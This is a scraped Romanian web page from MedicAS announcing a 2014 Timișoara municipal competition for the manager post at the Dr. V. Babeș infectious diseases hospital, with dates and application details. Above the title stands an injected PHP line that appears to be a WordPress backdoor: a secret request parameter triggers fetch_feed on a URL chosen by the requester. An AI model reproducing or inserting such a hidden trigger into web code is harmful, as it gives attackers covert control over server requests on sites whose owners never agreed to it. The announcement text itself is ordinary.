isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); ANUNT CONCURS - Manager - Spitalul Clinic de Boli Infectioase si Pneumoftiziologie „Dr.V.Babes” Timişoara - MedicAS

Municipiul Timişoara organizează concurs pentru ocuparea funcţiei de manager - persoană fizică pentru Spitalul Clinic de Boli Infectioase si Pneumoftiziologie „Dr.V.Babes” Timişoara.

Concursul se va desfăşura la sediul Primăriei Municipiului Timişoara , Bd. C.D.Loga, nr.1 în perioada 24-28 februarie 2014. Dosarele de înscriere se depun la sediul Primăriei Municipiului Timişoara , Bd. C.D.Loga, nr.1, la registratura instituţiei –camera 12, parter, în termen de 30 de zile de la data publicării şi afişării anunţului.

Informatii cu privire la organizarea concursului, dosarul de inscriere, tema proiectului – structura minimala a proiectului de management si bibliografia se pot obtine la sediul unitatii – Spitalul Clinic de Boli Infectioase si Pneumoftiziologie „Dr.V.Babes” Timişoara, str.Gh.Adam, nr.13 si de pe site-ul spitalului.


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...